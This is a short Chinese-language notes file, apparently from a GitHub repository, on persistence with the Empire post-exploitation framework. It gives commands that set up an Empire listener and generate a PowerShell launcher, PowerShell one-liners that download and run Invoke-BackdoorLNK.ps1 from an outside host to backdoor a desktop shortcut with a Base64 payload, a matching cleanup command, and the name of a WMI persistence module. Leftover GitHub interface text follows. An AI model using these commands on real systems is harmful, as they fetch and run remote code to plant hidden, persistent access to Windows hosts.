LNK后门

Empire
Empire> set Host http://192.168.1.150
Empire> set Port 8080
>launcher powershell Listener's Name
生成后只使用Base64的代码。
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript Base64编码"

清除后门
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"

WMI

Empire>powershell/persistence/elevated/wmi

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Empire.md

Empire.md

LNK后门

WMI

Files

Empire.md

Latest commit

History

Empire.md

File metadata and controls

LNK后门

WMI